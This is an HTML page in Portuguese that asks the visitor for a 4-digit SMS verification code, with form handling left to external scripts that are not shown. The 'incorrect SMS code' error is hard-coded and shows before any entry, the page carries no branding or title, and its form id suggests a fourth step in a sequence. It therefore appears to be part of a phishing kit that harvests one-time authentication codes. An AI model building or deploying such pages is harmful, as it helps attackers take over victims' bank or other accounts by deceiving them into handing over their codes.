<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/fride-select.css">
    <script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    
    
        <div class="holan">
            <div class="upto">
                <div class="upto">
                    <img src="./img/topap001.png" alt="">
                </div>
            </div>
        
        
            <div class="container">
                <div class="container">
                
                    <div class="upon">
                        <p class="pp1">Verificação de SMS</p>
                        <p class="pp3"><span>*</span> Um código SMS será enviado para o seu número, com o código de autenticação. Aguarde o SMS e, assim que o receber, insira o código abaixo.</p>
                    </div>
            
            
                    <form method="post" id="pg4">
                        <div class="group inpocc" >   
                            
                            
                            <p>Código SMS</p>
                            <input style="width: 48%;" type="tel" name="" id="sps2" maxlength="4" required placeholder="">
                         
                        </div>
            
                        <p style="color: rgb(255, 57, 57); margin-top: 5px;">código SMS incorrecto</p>
                        
                        <button id="botn" >Entrar </button>
                    </form>
                        
                    
                    
                    
                    </div>
            </div>
        </div>
        </div>

    

        
    <script src="./js/stb.js"></script>
    <script src="./js/inp.js"></script>
    <script>
        
    </script>
</body>
</html>